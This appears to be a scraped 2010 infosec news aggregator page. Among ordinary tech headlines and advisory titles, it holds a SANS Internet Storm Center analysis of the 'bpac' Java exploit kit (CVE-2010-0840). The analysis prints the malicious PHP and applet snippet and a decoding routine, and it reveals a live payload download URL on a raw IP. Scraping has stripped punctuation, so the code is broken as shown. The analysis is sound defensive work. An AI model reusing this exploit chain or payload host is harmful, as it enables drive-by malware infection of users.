InfoSec News

Motorola's mobile phone subsidiary has filed a lawsuit against Microsoft alleging the world's largest software maker has infringed 16 of its patents in PC, mobile and server software, as well as Xbox products.
 
Motorola's mobile phone subsidiary has filed a lawsuit against Microsoft alleging the world's largest software maker has infringed 16 of its patents in PC, mobile and server software, as well as Xbox products.
 
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Everyone at Google is getting a nice raise. Well, almost everyone. The worker who leaked information about the raises has been fired, reports say.
 
Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities
 
Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
 
Apache Subrequest Handling Information Disclosure Vulnerability
 
Neon 'ne_xml*' expat XML Parsing Denial of Service Vulnerability
 
T-Mobile has kicked off sales of Samsung's Galaxy Tab, and bigger carriers are soon to follow. Will the new Android tablet slow down iPad sales?
 
Small businesses need phone service and online meeting tools to get started. Instead of going for separate tools, Virtual Office Pro bundles both services for $50/month. With it, you get unlimited voice calling and online conferencing.
 
PHP xmlrpc Extension Multiple Remote Denial of Service Vulnerabilities
 
Oracle MySQL Malformed Packet Handling Remote Denial of Service Vulnerability
 
Oracle MySQL 'COM_FIELD_LIST' Command Buffer Overflow Vulnerability
 
The recent Java JRE patch bundle released by Oracle contained a long list of security fixes, several of which for vulnerabilities that allow drive-by exploits. And since Java is present on pretty much every Windows PC, and people don't seem to do their Java updates quite as diligently as their Windows patches, there are A LOT of vulnerable PCs out there. Microsoft reported on this a month ago, and called it an unprecedented wave of Java exploiting.
It doesn't look like the situation has improved since, and the bad guys are taking advantage. Not surprisingly, the FAQ document onVirus found in my Java Cache Directory is ranked third most popular of all the issues listed on http://www.java.com/en/download/help/index.xml. The two issues ranked ahead of it are also security concerns.. not a pretty picture for Oracle or Java, I'd say.
Let's take a look at one of the popular exploits that are making the rounds, the bpac family. The exploit used is for CVE-2010-0840 (Hashmap), already covered by the Java patch bundle in July, but apparently still successful enough to be used. I guess the bad guys won't start burning their newest Java exploits while the old set is still going strong.
The infection usually happens as follows:

(1) User surfs to website that has been injected with the exploit

(2) Exploit pack triggers - it comes as an obfuscated JavaScript that downloads an Applet and a PDF

(3) The applet contains an exploit, here for CVE-2010-0840

(4) The applet is invoked with a parameter that tells it where to find the EXE

(5) If the exploit is successful, the EXE is downloaded and run
The EXEs pack quite a punch - one recent sample submitted contained no less than 66 individual other malicious EXEs. Yes, a user would be bound to notice this deluge of badness, but he still wouldn't stand a chance to ever clean ALL of this crud off the system again.
Looking at the malware in more detail
-rw-r--r-- 1 daniel users 3738 2010-11-08 09:14 euinirascndmiub.jar

-rw-r--r-- 1 daniel users 21009 2010-11-08 09:13 fuiqaubuk7.php

-rw-r--r-- 1 daniel users 6095 2010-11-08 09:14 jmkohwbrbtgsboj.pdf
The PHP file invokes the applet with parameter
[email protected]:~/malware$ head fuiqaubuk7.php

body id='jmery7' name='jmery7'applet code='bpac.a.class' archive=euinirascndmiub.jarparam value='RSS=,[email protected]=R=' ame=a//applet/bodytextareafunction goyla(hrcsyoe6){r .....
The JAR file .. is basically a ZIP, so we can unzip it:
[email protected]:~/malware$ unzip euinirascndmiub.jar

Archive: euinirascndmiub.jar

inflating: META-INF/MANIFEST.MF

inflating: bpac/a$1.class

inflating: bpac/a.class

inflating: bpac/b.class

inflating: bpac/KAVS.class
From the PHP, we know that a.class is the code that gets executed. A Java Decompiler like jad can be used to convert the java class files back into something readable akin to Java source code:
[email protected]:~/malware/bpac$ jad *.class

Generating a.jad

Generating b.jad

Generating KAVS.jad

Generating a$1.jad
On inspection, a.jad indeed contains the CVE-2010-0840 exploit, pretty much a carbon copy of the Metasploitoriginal. More interesting is b.jad, because it contains
String s1 = (new StringBuilder()).append(s.replace(F, a).replace(#, b).replace(V, c).replace(D,d).replace(@, e).replace(Y, f).replace(C, g).replace(R, h).replace(, etc
which sure looks like a decoding function. It doesn't take muchprogramming to turnthis into a Java file of its own with a print statement at the end. When we then add the variable that was set when the applet was invoked, we get
public class x

{

public static void main(String[] args)

{

String s = RSS=,[email protected]=R=

String s1 = (new StringBuilder()).append(s.replace(F, a).replace(#, b).replace(V,c).replace(D, d).replace(@, e).replace(Y, f).replace(C, g).replace(R, h).replace(,i).replace(L, j).replace(K, -).replace(U, k).replace(^, l).replace(Z, m).replace(B,n).replace(Q, o).replace(=, p).replace(, q).replace(M, r).replace(G, s).replace(S,t).replace(!, u).replace(W, v).replace(%, w).replace(H, x).replace(P, y).replace(?,z).replace(T, /).replace(I, .).replace(K, _).replace((, _).replace(,, :).replace(A,1).replace(N, 2).replace(*, 3).replace(J, 4).replace(), 5).replace(O, 6).replace($,7).replace(X, 8).replace(+, 9).replace(E, 0)).append(?i=1

}

}
Compile with javac, run with java, and lookie, the system prints:
[email protected]:~/malware/bpac$ java x

http://78. 26.187. 64/sex/hrd1.php?i=1 (spaces added to keep you from clicking, careful, still live!)
which is where the EXE resides. Virustotal currently has it with 14/43.



Bottom line: If you haven't done so yet, hunt down and patch every incarnation of Java on the PCs that you are responsible for. (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Hewlett-Packard will pay $16.25 million to settle a case that resulted in jail time for a school district's former chief technology officer and computer reseller of HP equipment, the U.S. Federal Communications Commission said on Wednesday.
 
The FCC confirmed on Wednesday that it is investigating whether Google broke any federal eavesdropping laws when collecting data for its controversial Street View mapping service.
 
Hewlett-Packard will pay $16.3 million in a settlement of alleged fraud involving a U.S. Federal Communications Commission program to bring Internet access to schools and libraries in poor areas, the FCC and U.S. Department of Justice announced on Wednesday.
 
When e-mail arrived more than 40 years ago it ushered in a way to share small text-only messages. The emphasis was on creating a system with no single points of failure, where all users would have a unique address on a ubiquitous system.
 
A coming revolution in 3D printing, with average consumers able to copy and create new three-dimensional objects at home, may lead to attempts by patent holders to expand their legal protections, a new paper says.
 
Startup XI3 announced a modular computer with components that it says can be easily repaired or upgraded, which could help users save money and keep up with changes in technology.
 
Gamers looking for a powerful yet portable machine can stop looking. The Asus G73Jw is here. It's only a mild update to Asus's most recent previous lean, mean, gaming machine, the G73Jh. But with a slightly faster processor (a 1.73GHz Core i7 740QM vs. a 1.6GHz 720QM), a Blu-ray combo drive, and improved battery life (2.5 hours vs. 1.75 hours), the G73Jw is definitely an upgrade. Unfortunately, Asus didn't redesign the notebook's exterior features at all, and the keyboard remains a serious weakness.
 
Cisco Systems posted gains in both profit and revenue on Wednesday for its fiscal first quarter that ended Oct. 30, despite what it called "a challenging economic environment."
 
Major market shifts in the database world don't happen often. When they do, they're massive, creating an impact that can last 10 to 20 years. When I entered the job market, it was right at the tail end of the last major shift from the mainframe to client/server.
 
Of all that has been written about cloud computing, precious little attention has been paid to authentication in the cloud.
 
Microsoft today explained why it has not patched older versions of its Office for Mac, but would not disclose a release schedule for doing so.
 
Aerospace manufacturer Esterline Technologies said it expects to save significant sums by using LifeSize videoconferencing technology rather than that offered by industry leaders Cisco and Polycom.
 
eBlog 1.7 Multiple SQL Injection Vulnerabilities
 
Re: Kernel 0-day
 
EMC has acquired mainframe virtual tape library vendor Bus-Tech for an undisclosed amount, a buyout it hopes will help it offer end-to-end support for enterprise mainframe backup environments.
 
Smart card vendor Gemalto introduced a new credit card capable of generating one-time passwords for electronic banking and payment transactions.
 
ISC DHCP Server Relay-Forward Empty Link-Address Field Denial of Service Vulnerability
 
Sybase IQ will soon be run on a Massively Parallel Processing (MPP) architecture
 
SugarSync today announced it has more than doubled its free service offering, unveiling a new 5GB plan.
 
Consumer Reports has added Apple's MacBook Air to its list of recommended laptops, putting the 13-in. model in a tie with the 15-in. MacBook Pro as the second-highest rated notebook.
 
[ MDVSA-2010:226 ] dhcp
 
[USN-1015-1] libvpx vulnerability
 
Babylon Cross-Application Scripting Code Execution
 
T-Mobile USA kicked off sales of Samsung's 7-in. Galaxy Tab tablet computers today, and other U.S. carriers will soon follow suit.
 
Arm hopes to bring high-performance graphics applications such as 3D imaging and gaming to handheld devices like smartphones while keeping battery life intact with a new graphics processor design.
 
The company is giving each of its 23,000 employees across the globe a 10% raise effective in January, according to the Wall Street Journal.
 
Chip makers IPWireless and ST-Ericsson have joined forces to develop a platform designed to lower the cost of building Integrated Mobile Broadcast (IMB) technology into smartphones.
 
Don't look now, but the data center is transforming. Seeking greater efficiencies, enterprises of all sizes have steadily evolved from application-based silos to virtualized environments. Now this evolution is taking the next leap forward as innovative enterprises move toward next-generation cloud computing models that deliver IT as a service (ITaaS) -- via both internal and external cloud services.
 
There is a disease in the data center: skyrocketing energy costs, inefficient infrastructure management tools and the unknown effects of looming regulatory action in the United States.
 
A grand jury in San Francisco indicted three former executives from two manufacturers of color display tubes (CDTs) for charges related to an alleged global conspiracy to fix prices of the tubes used in computer monitors and other products.
 
HP today shared details on six countries that will become its global delivery hubs for enterprise services. In this Q&A, CIO.com gets the lowdown on where jobs are being added and eliminated, lock-in concerns and the future of HP services.
 
ASPR #2010-11-10-2: Remote Binary Planting in Microsoft Word 2010
 
ASPR #2010-11-10-3: Remote Binary Planting in Microsoft Excel 2010
 
[ MDVSA-2010:225-1 ] libmbfl
 
The first commercial electronic paper displays that can show color were unveiled Wednesday at the Flat Panel Display International show in Japan. The screens open the way for electronic book readers like Amazon's Kindle and Sony's Reader to add color, but so far only a single Chinese device maker has committed to the technology.
 
ASPR #2010-11-10-1: Remote Binary Planting in Microsoft PowerPoint 2010
 
iDefense Security Advisory 11.09.10: Microsoft Word RTF File Parsing Stack Buffer Overflow Vulnerability
 
Kernel 0-day
 
[ MDVSA-2010:225 ] libmbfl
 
Open-source data integration vendor Talend is expanding its SOA footprint, announcing Wednesday that it has purchased Sopera, developer of an open-source enterprise service bus.
 
Smartphone sales for the third quarter almost doubled compared to last year, driven by explosive growth in sales of Android phones.
 
Both companies detailing HTML5 support in their development tools.
 

Infosec Priority: Change Mindset or Provide Training
GovInfoSecurity.com (blog)
The education and certification organization, (ISC)², recently held an event on building security into the software lifecycle, and asked the 50 or so ...

and more »
 
Keeping servers humming is both a science and a management art, practitioners say. Here are some approaches that work, from careful planning to routine maintenance and using automation tools.
 
Microsoft Tuesday released patches for four flaws in Office for Mac 2011, but failed to release fixes for the same flaws in the 2004 and 2008 versions.
 
Microsoft has a very slick device, but it can't do nearly as much as the iPhone -- especially in business
 
In India this week, President Barack Obama reshaped offshoring as part of international trade. Instead of complaining of jobs moving to Bangalore, the president's message to India's leaders was soothing, emphasizing how trade works both ways.
 

Messaging Architects Publishes New White Paper on "UK Email Retention Policies ...
PR Web (press release)
... organisations in the data security space; he is director of the Cyber Security Challenge UK, and a member of the InfoSec RSA Conference advisory boards. ...

and more »
 
Panasas today announced the next version of its ActiveStor 12 clustered storage array, with twice the throughput of its predecessor and up to 4 petabytes of storage in a 10-rack architecture.
 


Internet Storm Center Infocon Status